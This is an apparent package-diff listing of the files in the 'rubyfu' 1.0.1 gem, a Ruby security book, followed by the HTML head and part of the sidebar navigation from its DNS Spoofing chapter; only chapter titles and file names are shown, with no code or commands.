rubyfu 1.0.1
- checksums.yaml +7 -0
- data/README.md +96 -0
- data/Rakefile +1 -0
- data/_book/beginners.html +1299 -0
- data/_book/contribution.html +1350 -0
- data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
- data/_book/contributors/index.html +1294 -0
- data/_book/contributors/todo.html +1293 -0
- data/_book/cover.jpg +0 -0
- data/_book/faqs/index.html +1308 -0
- data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
- data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
- data/_book/files/module06/ftp.pcap +0 -0
- data/_book/files/module06/packets.pcap +0 -0
- data/_book/gitbook/app.js +25001 -0
- data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
- data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
- data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
- data/_book/gitbook/images/favicon.ico +0 -0
- data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
- data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
- data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
- data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
- data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
- data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
- data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
- data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
- data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
- data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
- data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
- data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
- data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
- data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
- data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
- data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
- data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
- data/_book/gitbook/style.css +9 -0
- data/_book/googlec55db2d603c3da8b.html +1 -0
- data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
- data/_book/images/module02/packaging__ocra1.png +0 -0
- data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
- data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
- data/_book/images/module04/webfu__post_form1.png +0 -0
- data/_book/images/module04/webfu__proxy2.png +0 -0
- data/_book/images/module04/webfu__twitterAPI1.png +0 -0
- data/_book/images/module04/webfu__xmlrpc1.png +0 -0
- data/_book/images/module05/msf_template1.png +0 -0
- data/_book/images/module06/win-foren__winreg1.png +0 -0
- data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
- data/_book/images/other/cover.jpg +0 -0
- data/_book/images/other/cover_small.jpg +0 -0
- data/_book/images/other/logo.png +0 -0
- data/_book/images/other/rubyfu.png +0 -0
- data/_book/images/other/rubyfu1.png +0 -0
- data/_book/images/other/rubyfu3.png +0 -0
- data/_book/images/other/rubyfu4.png +0 -0
- data/_book/images/other/rubyfu_.png +0 -0
- data/_book/index.html +1284 -0
- data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
- data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
- data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
- data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
- data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
- data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
- data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
- data/_book/module_0x2__system_kung_fu/email.html +1352 -0
- data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
- data/_book/module_0x2__system_kung_fu/index.html +1557 -0
- data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
- data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
- data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
- data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
- data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
- data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
- data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
- data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
- data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
- data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
- data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
- data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
- data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
- data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
- data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
- data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
- data/_book/module_0x3__network_kung_fu/index.html +1392 -0
- data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
- data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
- data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
- data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
- data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
- data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
- data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
- data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
- data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
- data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
- data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
- data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
- data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
- data/_book/module_0x4__web_kung_fu/index.html +1536 -0
- data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
- data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
- data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
- data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
- data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
- data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
- data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
- data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
- data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
- data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
- data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
- data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
- data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
- data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
- data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
- data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
- data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
- data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
- data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
- data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
- data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
- data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
- data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
- data/_book/module_0x6__forensic/android_forensic.html +1356 -0
- data/_book/module_0x6__forensic/index.html +1332 -0
- data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
- data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
- data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
- data/_book/package.json +5 -0
- data/_book/references/index.html +1338 -0
- data/_book/required_gems.html +1342 -0
- data/_book/rubyfu_.png +0 -0
- data/_book/search_index.json +1 -0
- data/_book/styles/ebook.css +1 -0
- data/_book/styles/epub.css +1 -0
- data/_book/styles/header.js +5 -0
- data/_book/styles/mobi.css +1 -0
- data/_book/styles/pdf.css +1 -0
- data/_book/styles/website.css +41 -0
- data/bin/rubyfu +48 -0
- data/lib/rubyfu.rb +36 -0
- data/lib/rubyfu/browse.rb +35 -0
- data/lib/rubyfu/version.rb +3 -0
- data/lib/rubyfu/webserver.rb +30 -0
- metadata +210 -0
|
@@ -0,0 +1,1694 @@
|
|
|
1
|
+
<!DOCTYPE HTML>
|
|
2
|
+
<html lang="en" >
|
|
3
|
+
|
|
4
|
+
<head>
|
|
5
|
+
|
|
6
|
+
<meta charset="UTF-8">
|
|
7
|
+
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
|
|
8
|
+
<title>DNS Spoofing | RubyFu</title>
|
|
9
|
+
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
|
|
10
|
+
<meta name="description" content="">
|
|
11
|
+
<meta name="generator" content="GitBook 2.6.2">
|
|
12
|
+
|
|
13
|
+
|
|
14
|
+
<meta name="HandheldFriendly" content="true"/>
|
|
15
|
+
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
|
|
16
|
+
<meta name="apple-mobile-web-app-capable" content="yes">
|
|
17
|
+
<meta name="apple-mobile-web-app-status-bar-style" content="black">
|
|
18
|
+
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
|
|
19
|
+
<link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
|
|
20
|
+
|
|
21
|
+
<link rel="stylesheet" href="../gitbook/style.css">
|
|
22
|
+
|
|
23
|
+
|
|
24
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
|
|
28
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
|
|
29
|
+
|
|
30
|
+
|
|
31
|
+
|
|
32
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
|
|
33
|
+
|
|
34
|
+
|
|
35
|
+
|
|
36
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
|
|
37
|
+
|
|
38
|
+
|
|
39
|
+
|
|
40
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
|
|
41
|
+
|
|
42
|
+
|
|
43
|
+
|
|
44
|
+
<link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
|
|
45
|
+
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
<link rel="stylesheet" href="../styles/website.css">
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
|
|
52
|
+
|
|
53
|
+
|
|
54
|
+
<link rel="next" href="../module_0x4__web_kung_fu/index.html" />
|
|
55
|
+
|
|
56
|
+
|
|
57
|
+
<link rel="prev" href="../module_0x3__network_kung_fu/arp_spoofing.html" />
|
|
58
|
+
|
|
59
|
+
|
|
60
|
+
<script type="text/javascript" src="../styles/header.js"></script>
|
|
61
|
+
</head>
|
|
62
|
+
<body>
|
|
63
|
+
|
|
64
|
+
|
|
65
|
+
<div class="book"
|
|
66
|
+
data-level="3.10.2"
|
|
67
|
+
data-chapter-title="DNS Spoofing"
|
|
68
|
+
data-filepath="module_0x3__network_kung_fu/dns_spoofing.md"
|
|
69
|
+
data-basepath=".."
|
|
70
|
+
data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
|
|
71
|
+
data-innerlanguage="">
|
|
72
|
+
|
|
73
|
+
|
|
74
|
+
<div class="book-summary">
|
|
75
|
+
<nav role="navigation">
|
|
76
|
+
<ul class="summary">
|
|
77
|
+
|
|
78
|
+
|
|
79
|
+
|
|
80
|
+
|
|
81
|
+
|
|
82
|
+
|
|
83
|
+
|
|
84
|
+
|
|
85
|
+
|
|
86
|
+
<li class="chapter " data-level="0" data-path="index.html">
|
|
87
|
+
|
|
88
|
+
|
|
89
|
+
<a href="../index.html">
|
|
90
|
+
|
|
91
|
+
<i class="fa fa-check"></i>
|
|
92
|
+
|
|
93
|
+
Module 0x0 | Introduction
|
|
94
|
+
</a>
|
|
95
|
+
|
|
96
|
+
|
|
97
|
+
<ul class="articles">
|
|
98
|
+
|
|
99
|
+
|
|
100
|
+
<li class="chapter " data-level="0.1" data-path="contribution.html">
|
|
101
|
+
|
|
102
|
+
|
|
103
|
+
<a href="../contribution.html">
|
|
104
|
+
|
|
105
|
+
<i class="fa fa-check"></i>
|
|
106
|
+
|
|
107
|
+
<b>0.1.</b>
|
|
108
|
+
|
|
109
|
+
Contribution
|
|
110
|
+
</a>
|
|
111
|
+
|
|
112
|
+
|
|
113
|
+
</li>
|
|
114
|
+
|
|
115
|
+
<li class="chapter " data-level="0.2" data-path="beginners.html">
|
|
116
|
+
|
|
117
|
+
|
|
118
|
+
<a href="../beginners.html">
|
|
119
|
+
|
|
120
|
+
<i class="fa fa-check"></i>
|
|
121
|
+
|
|
122
|
+
<b>0.2.</b>
|
|
123
|
+
|
|
124
|
+
Beginners
|
|
125
|
+
</a>
|
|
126
|
+
|
|
127
|
+
|
|
128
|
+
</li>
|
|
129
|
+
|
|
130
|
+
<li class="chapter " data-level="0.3" data-path="required_gems.html">
|
|
131
|
+
|
|
132
|
+
|
|
133
|
+
<a href="../required_gems.html">
|
|
134
|
+
|
|
135
|
+
<i class="fa fa-check"></i>
|
|
136
|
+
|
|
137
|
+
<b>0.3.</b>
|
|
138
|
+
|
|
139
|
+
Required Gems
|
|
140
|
+
</a>
|
|
141
|
+
|
|
142
|
+
|
|
143
|
+
</li>
|
|
144
|
+
|
|
145
|
+
|
|
146
|
+
</ul>
|
|
147
|
+
|
|
148
|
+
</li>
|
|
149
|
+
|
|
150
|
+
<li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
|
|
151
|
+
|
|
152
|
+
|
|
153
|
+
<a href="../module_0x1__basic_ruby_kung_fu/index.html">
|
|
154
|
+
|
|
155
|
+
<i class="fa fa-check"></i>
|
|
156
|
+
|
|
157
|
+
<b>1.</b>
|
|
158
|
+
|
|
159
|
+
Module 0x1 | Basic Ruby Kung Fu
|
|
160
|
+
</a>
|
|
161
|
+
|
|
162
|
+
|
|
163
|
+
<ul class="articles">
|
|
164
|
+
|
|
165
|
+
|
|
166
|
+
<li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
|
|
167
|
+
|
|
168
|
+
|
|
169
|
+
<a href="../module_0x1__basic_ruby_kung_fu/string.html">
|
|
170
|
+
|
|
171
|
+
<i class="fa fa-check"></i>
|
|
172
|
+
|
|
173
|
+
<b>1.1.</b>
|
|
174
|
+
|
|
175
|
+
String
|
|
176
|
+
</a>
|
|
177
|
+
|
|
178
|
+
|
|
179
|
+
<ul class="articles">
|
|
180
|
+
|
|
181
|
+
|
|
182
|
+
<li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
|
|
183
|
+
|
|
184
|
+
|
|
185
|
+
<a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
|
|
186
|
+
|
|
187
|
+
<i class="fa fa-check"></i>
|
|
188
|
+
|
|
189
|
+
<b>1.1.1.</b>
|
|
190
|
+
|
|
191
|
+
Conversion
|
|
192
|
+
</a>
|
|
193
|
+
|
|
194
|
+
|
|
195
|
+
</li>
|
|
196
|
+
|
|
197
|
+
<li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
|
|
198
|
+
|
|
199
|
+
|
|
200
|
+
<a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
|
|
201
|
+
|
|
202
|
+
<i class="fa fa-check"></i>
|
|
203
|
+
|
|
204
|
+
<b>1.1.2.</b>
|
|
205
|
+
|
|
206
|
+
Extraction
|
|
207
|
+
</a>
|
|
208
|
+
|
|
209
|
+
|
|
210
|
+
</li>
|
|
211
|
+
|
|
212
|
+
|
|
213
|
+
</ul>
|
|
214
|
+
|
|
215
|
+
</li>
|
|
216
|
+
|
|
217
|
+
<li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
|
|
218
|
+
|
|
219
|
+
|
|
220
|
+
<a href="../module_0x1__basic_ruby_kung_fu/array.html">
|
|
221
|
+
|
|
222
|
+
<i class="fa fa-check"></i>
|
|
223
|
+
|
|
224
|
+
<b>1.2.</b>
|
|
225
|
+
|
|
226
|
+
Array
|
|
227
|
+
</a>
|
|
228
|
+
|
|
229
|
+
|
|
230
|
+
</li>
|
|
231
|
+
|
|
232
|
+
|
|
233
|
+
</ul>
|
|
234
|
+
|
|
235
|
+
</li>
|
|
236
|
+
|
|
237
|
+
<li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
|
|
238
|
+
|
|
239
|
+
|
|
240
|
+
<a href="../module_0x2__system_kung_fu/index.html">
|
|
241
|
+
|
|
242
|
+
<i class="fa fa-check"></i>
|
|
243
|
+
|
|
244
|
+
<b>2.</b>
|
|
245
|
+
|
|
246
|
+
Module 0x2 | System Kung Fu
|
|
247
|
+
</a>
|
|
248
|
+
|
|
249
|
+
|
|
250
|
+
<ul class="articles">
|
|
251
|
+
|
|
252
|
+
|
|
253
|
+
<li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
|
|
254
|
+
|
|
255
|
+
|
|
256
|
+
<a href="../module_0x2__system_kung_fu/command_execution.html">
|
|
257
|
+
|
|
258
|
+
<i class="fa fa-check"></i>
|
|
259
|
+
|
|
260
|
+
<b>2.1.</b>
|
|
261
|
+
|
|
262
|
+
Command Execution
|
|
263
|
+
</a>
|
|
264
|
+
|
|
265
|
+
|
|
266
|
+
</li>
|
|
267
|
+
|
|
268
|
+
<li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
|
|
269
|
+
|
|
270
|
+
|
|
271
|
+
<a href="../module_0x2__system_kung_fu/file_manipulation.html">
|
|
272
|
+
|
|
273
|
+
<i class="fa fa-check"></i>
|
|
274
|
+
|
|
275
|
+
<b>2.2.</b>
|
|
276
|
+
|
|
277
|
+
File manipulation
|
|
278
|
+
</a>
|
|
279
|
+
|
|
280
|
+
|
|
281
|
+
<ul class="articles">
|
|
282
|
+
|
|
283
|
+
|
|
284
|
+
<li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
|
|
285
|
+
|
|
286
|
+
|
|
287
|
+
<a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
|
|
288
|
+
|
|
289
|
+
<i class="fa fa-check"></i>
|
|
290
|
+
|
|
291
|
+
<b>2.2.1.</b>
|
|
292
|
+
|
|
293
|
+
Parsing HTML, XML, JSON
|
|
294
|
+
</a>
|
|
295
|
+
|
|
296
|
+
|
|
297
|
+
</li>
|
|
298
|
+
|
|
299
|
+
|
|
300
|
+
</ul>
|
|
301
|
+
|
|
302
|
+
</li>
|
|
303
|
+
|
|
304
|
+
<li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
|
|
305
|
+
|
|
306
|
+
|
|
307
|
+
<a href="../module_0x2__system_kung_fu/cryptography.html">
|
|
308
|
+
|
|
309
|
+
<i class="fa fa-check"></i>
|
|
310
|
+
|
|
311
|
+
<b>2.3.</b>
|
|
312
|
+
|
|
313
|
+
Cryptography
|
|
314
|
+
</a>
|
|
315
|
+
|
|
316
|
+
|
|
317
|
+
</li>
|
|
318
|
+
|
|
319
|
+
<li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
|
|
320
|
+
|
|
321
|
+
|
|
322
|
+
<a href="../module_0x2__system_kung_fu/system_shell.html">
|
|
323
|
+
|
|
324
|
+
<i class="fa fa-check"></i>
|
|
325
|
+
|
|
326
|
+
<b>2.4.</b>
|
|
327
|
+
|
|
328
|
+
Remote Shell
|
|
329
|
+
</a>
|
|
330
|
+
|
|
331
|
+
|
|
332
|
+
<ul class="articles">
|
|
333
|
+
|
|
334
|
+
|
|
335
|
+
<li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
|
|
336
|
+
|
|
337
|
+
|
|
338
|
+
<a href="../module_0x2__system_kung_fu/ncatrb.html">
|
|
339
|
+
|
|
340
|
+
<i class="fa fa-check"></i>
|
|
341
|
+
|
|
342
|
+
<b>2.4.1.</b>
|
|
343
|
+
|
|
344
|
+
Ncat.rb
|
|
345
|
+
</a>
|
|
346
|
+
|
|
347
|
+
|
|
348
|
+
</li>
|
|
349
|
+
|
|
350
|
+
<li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
|
|
351
|
+
|
|
352
|
+
|
|
353
|
+
<a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
|
|
354
|
+
|
|
355
|
+
<i class="fa fa-check"></i>
|
|
356
|
+
|
|
357
|
+
<b>2.4.2.</b>
|
|
358
|
+
|
|
359
|
+
RCE as a Service
|
|
360
|
+
</a>
|
|
361
|
+
|
|
362
|
+
|
|
363
|
+
</li>
|
|
364
|
+
|
|
365
|
+
|
|
366
|
+
</ul>
|
|
367
|
+
|
|
368
|
+
</li>
|
|
369
|
+
|
|
370
|
+
<li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
|
|
371
|
+
|
|
372
|
+
|
|
373
|
+
<a href="../module_0x2__system_kung_fu/virustotal.html">
|
|
374
|
+
|
|
375
|
+
<i class="fa fa-check"></i>
|
|
376
|
+
|
|
377
|
+
<b>2.5.</b>
|
|
378
|
+
|
|
379
|
+
VirusTotal
|
|
380
|
+
</a>
|
|
381
|
+
|
|
382
|
+
|
|
383
|
+
</li>
|
|
384
|
+
|
|
385
|
+
|
|
386
|
+
</ul>
|
|
387
|
+
|
|
388
|
+
</li>
|
|
389
|
+
|
|
390
|
+
<li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
|
|
391
|
+
|
|
392
|
+
|
|
393
|
+
<a href="../module_0x3__network_kung_fu/index.html">
|
|
394
|
+
|
|
395
|
+
<i class="fa fa-check"></i>
|
|
396
|
+
|
|
397
|
+
<b>3.</b>
|
|
398
|
+
|
|
399
|
+
Module 0x3 | Network Kung Fu
|
|
400
|
+
</a>
|
|
401
|
+
|
|
402
|
+
|
|
403
|
+
<ul class="articles">
|
|
404
|
+
|
|
405
|
+
|
|
406
|
+
<li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
|
|
407
|
+
|
|
408
|
+
|
|
409
|
+
<a href="../module_0x3__network_kung_fu/ruby_socket.html">
|
|
410
|
+
|
|
411
|
+
<i class="fa fa-check"></i>
|
|
412
|
+
|
|
413
|
+
<b>3.1.</b>
|
|
414
|
+
|
|
415
|
+
Ruby Socket
|
|
416
|
+
</a>
|
|
417
|
+
|
|
418
|
+
|
|
419
|
+
</li>
|
|
420
|
+
|
|
421
|
+
<li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
|
|
422
|
+
|
|
423
|
+
|
|
424
|
+
<a href="../module_0x3__network_kung_fu/ssid_finder.html">
|
|
425
|
+
|
|
426
|
+
<i class="fa fa-check"></i>
|
|
427
|
+
|
|
428
|
+
<b>3.2.</b>
|
|
429
|
+
|
|
430
|
+
SSID Finder
|
|
431
|
+
</a>
|
|
432
|
+
|
|
433
|
+
|
|
434
|
+
</li>
|
|
435
|
+
|
|
436
|
+
<li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
|
|
437
|
+
|
|
438
|
+
|
|
439
|
+
<a href="../module_0x3__network_kung_fu/ftp.html">
|
|
440
|
+
|
|
441
|
+
<i class="fa fa-check"></i>
|
|
442
|
+
|
|
443
|
+
<b>3.3.</b>
|
|
444
|
+
|
|
445
|
+
FTP
|
|
446
|
+
</a>
|
|
447
|
+
|
|
448
|
+
|
|
449
|
+
</li>
|
|
450
|
+
|
|
451
|
+
<li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
|
|
452
|
+
|
|
453
|
+
|
|
454
|
+
<a href="../module_0x3__network_kung_fu/ssh.html">
|
|
455
|
+
|
|
456
|
+
<i class="fa fa-check"></i>
|
|
457
|
+
|
|
458
|
+
<b>3.4.</b>
|
|
459
|
+
|
|
460
|
+
SSH
|
|
461
|
+
</a>
|
|
462
|
+
|
|
463
|
+
|
|
464
|
+
</li>
|
|
465
|
+
|
|
466
|
+
<li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
|
|
467
|
+
|
|
468
|
+
|
|
469
|
+
<a href="../module_0x2__system_kung_fu/email.html">
|
|
470
|
+
|
|
471
|
+
<i class="fa fa-check"></i>
|
|
472
|
+
|
|
473
|
+
<b>3.5.</b>
|
|
474
|
+
|
|
475
|
+
Email
|
|
476
|
+
</a>
|
|
477
|
+
|
|
478
|
+
|
|
479
|
+
<ul class="articles">
|
|
480
|
+
|
|
481
|
+
|
|
482
|
+
<li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
|
|
483
|
+
|
|
484
|
+
|
|
485
|
+
<a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
|
|
486
|
+
|
|
487
|
+
<i class="fa fa-check"></i>
|
|
488
|
+
|
|
489
|
+
<b>3.5.1.</b>
|
|
490
|
+
|
|
491
|
+
SMTP Enumeration
|
|
492
|
+
</a>
|
|
493
|
+
|
|
494
|
+
|
|
495
|
+
</li>
|
|
496
|
+
|
|
497
|
+
|
|
498
|
+
</ul>
|
|
499
|
+
|
|
500
|
+
</li>
|
|
501
|
+
|
|
502
|
+
<li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
|
|
503
|
+
|
|
504
|
+
|
|
505
|
+
<a href="../module_0x3__network_kung_fu/network_scanning.html">
|
|
506
|
+
|
|
507
|
+
<i class="fa fa-check"></i>
|
|
508
|
+
|
|
509
|
+
<b>3.6.</b>
|
|
510
|
+
|
|
511
|
+
Network Scanning
|
|
512
|
+
</a>
|
|
513
|
+
|
|
514
|
+
|
|
515
|
+
<ul class="articles">
|
|
516
|
+
|
|
517
|
+
|
|
518
|
+
<li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
|
|
519
|
+
|
|
520
|
+
|
|
521
|
+
<a href="../module_0x3__network_kung_fu/nmap.html">
|
|
522
|
+
|
|
523
|
+
<i class="fa fa-check"></i>
|
|
524
|
+
|
|
525
|
+
<b>3.6.1.</b>
|
|
526
|
+
|
|
527
|
+
Nmap
|
|
528
|
+
</a>
|
|
529
|
+
|
|
530
|
+
|
|
531
|
+
</li>
|
|
532
|
+
|
|
533
|
+
|
|
534
|
+
</ul>
|
|
535
|
+
|
|
536
|
+
</li>
|
|
537
|
+
|
|
538
|
+
<li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
|
|
539
|
+
|
|
540
|
+
|
|
541
|
+
<a href="../module_0x3__network_kung_fu/dns.html">
|
|
542
|
+
|
|
543
|
+
<i class="fa fa-check"></i>
|
|
544
|
+
|
|
545
|
+
<b>3.7.</b>
|
|
546
|
+
|
|
547
|
+
DNS
|
|
548
|
+
</a>
|
|
549
|
+
|
|
550
|
+
|
|
551
|
+
<ul class="articles">
|
|
552
|
+
|
|
553
|
+
|
|
554
|
+
<li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
|
|
555
|
+
|
|
556
|
+
|
|
557
|
+
<a href="../module_0x3__network_kung_fu/dns_enumeration.html">
|
|
558
|
+
|
|
559
|
+
<i class="fa fa-check"></i>
|
|
560
|
+
|
|
561
|
+
<b>3.7.1.</b>
|
|
562
|
+
|
|
563
|
+
DNS Enumeration
|
|
564
|
+
</a>
|
|
565
|
+
|
|
566
|
+
|
|
567
|
+
</li>
|
|
568
|
+
|
|
569
|
+
|
|
570
|
+
</ul>
|
|
571
|
+
|
|
572
|
+
</li>
|
|
573
|
+
|
|
574
|
+
<li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
|
|
575
|
+
|
|
576
|
+
|
|
577
|
+
<a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
|
|
578
|
+
|
|
579
|
+
<i class="fa fa-check"></i>
|
|
580
|
+
|
|
581
|
+
<b>3.8.</b>
|
|
582
|
+
|
|
583
|
+
SNMP Enumeration
|
|
584
|
+
</a>
|
|
585
|
+
|
|
586
|
+
|
|
587
|
+
</li>
|
|
588
|
+
|
|
589
|
+
